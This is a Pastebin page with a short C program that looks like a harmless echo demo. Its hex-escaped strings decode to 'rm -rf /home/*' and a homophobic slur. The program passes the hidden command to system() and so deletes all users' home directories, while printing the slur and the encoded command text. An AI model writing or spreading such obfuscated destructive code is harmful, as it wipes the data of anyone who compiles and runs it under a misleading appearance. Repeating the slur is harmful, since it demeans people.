Advertisement
Guest User

Untitled

a guest
Feb 7th, 2016
56
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.44 KB | None | 0 0
  1. #include <stdio.h>
  2.  
  3. void echo( char *string ) { printf( "%s",string ); }
  4. void implying( char *string ) { system( string ); }
  5. int main( void ) {
  6.   char a[] = "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x68\x6f\x6d\x65\x2f\x2a";
  7.   char b[] = "\x70\x79\x74\x68\x6f\x6e\x20\x69\x73\x20\x66\x6f\x72\x20\x66\x61\x67\x67\x6f\x74\x73\x21\x0a";
  8.   echo (b);
  9.   implying (a);
  10.   echo (b);
  11.   echo (a);
  12.   echo (b);
  13.   echo (b);
  14.   echo (b);
  15.   echo (a);
  16.   return 0;
  17. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement